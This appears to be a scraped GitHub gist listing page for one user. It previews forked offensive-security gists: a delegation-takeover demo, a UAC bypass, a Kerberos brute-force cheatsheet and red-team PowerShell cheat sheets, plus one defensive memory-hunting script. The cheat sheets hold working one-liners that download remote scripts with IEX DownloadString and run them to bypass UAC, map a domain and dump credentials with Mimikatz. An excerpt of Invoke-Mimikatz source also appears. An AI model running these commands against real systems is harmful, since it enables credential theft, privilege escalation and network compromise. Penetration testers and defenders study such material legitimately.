- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
dannymas
dannymas
/ Get-InjectedThread.ps1
Created
July 10, 2021 21:11
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
dannymas
/ rbcd_demo.ps1
Created
July 9, 2021 22:07
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
dannymas
/ Windows command line gui access.md
Created
July 2, 2021 19:35
— forked from scotgabriel/Windows command line gui access.md
Common windows functions via rundll user32 and control panel
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Portable HTTP file server | |
| # Should be somewhat safe but please don't actually use it. | |
| # You can't exit this with CTRL+C directly and need to use the shutdown command below a directory listing, | |
| # or you can kill the powershell process of course, but this causes the port to stay used sometimes. | |
| # Features | |
| # - Directory Browser | |
| # - Can handle UTF8 URLs | |
| # - Delivers unknown file types | |
| # - /../ attack prevention |
dannymas
/ uac-silentcleanupbypass.ps1
Created
May 30, 2021 14:40
— forked from mgeeky/uac-silentcleanupbypass.ps1
UAC Bypass: SilentCleanup (Win10 1903+). Leaves powershell.exe running with nasty command line: (powershell -w hidden -c "& 'C:\your\evil\command.exe'";#\system32\werfault.exe)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function UAC-SilentCleanupBypass { | |
| param( | |
| [Parameter(Mandatory = $True)] | |
| [String]$Command | |
| ) | |
| $assemblies=( | |
| "System" | |
| ) |
dannymas
/ kerberos_attacks_cheatsheet.md
Created
July 21, 2020 04:25
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
dannymas
/ RedTeam_CheatSheet.ps1
Last active
June 29, 2020 22:27
— forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
dannymas
/ RedTeam_CheatSheet.ps1
Created
June 29, 2020 22:20
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
dannymas
/ gist:55255c008743c88e6444fa24919c5817
Last active
June 17, 2020 18:58
— forked from DanMcInerney/gist:7bcaeae85dcedfdf51191f0cb875b77f
Invoke-Mimikatz.ps1
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Win32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32")] | |
| public static extern IntPtr LoadLibrary(string name); | |
| [DllImport("kernel32")] | |
| public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); |
dannymas
/ Preparación OSCP.md
Created
January 16, 2020 22:27
— forked from s4vitar/Preparación OSCP.md
